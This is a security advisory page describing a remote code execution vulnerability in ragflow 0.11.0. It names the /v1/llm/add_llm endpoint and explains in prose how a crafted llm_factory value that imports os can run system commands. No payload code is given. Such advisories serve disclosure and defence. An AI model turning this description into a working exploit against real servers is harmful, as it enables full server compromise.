High

ragflow

RCE via /add_llm Endpoint

A remote code execution (RCE) vulnerability was discovered in the `add_llm` function of `llm_app.py` in version 0.11.0. The vulnerability allows attackers to execute arbitrary code by manipulating user-supplied input. The issue has not yet been patched.

Available publicly on Jan 16 2025

Threat Overview

The add_llm function in llm_app.py is vulnerable to remote code execution due to improper handling of user-supplied input. Specifically, the function uses values from the req dictionary to dynamically instantiate classes from several model dictionaries without comprehensive input validation or sanitization. This allows an attacker to provide malicious input that can be executed as arbitrary code, leading to full compromise of the server.

Attack Scenario

An attacker crafts a malicious payload and sends it to the /v1/llm/add_llm endpoint. By setting the llm_factory parameter to a string that imports the os module and executes a system command, the attacker can run arbitrary commands on the server. For example, the attacker could use the payload to execute a command that sleeps for 30 seconds, demonstrating the ability to run arbitrary code.

Who is affected

Users and administrators of the Ragflow API server running version 0.11.0 are affected by this vulnerability. Any application or service relying on this API endpoint is at risk.

Technical Report
Want more out of Sightline?

Sightline offers even more for premium customers

Go Premium

We have - related security advisories that are available with Sightline Premium.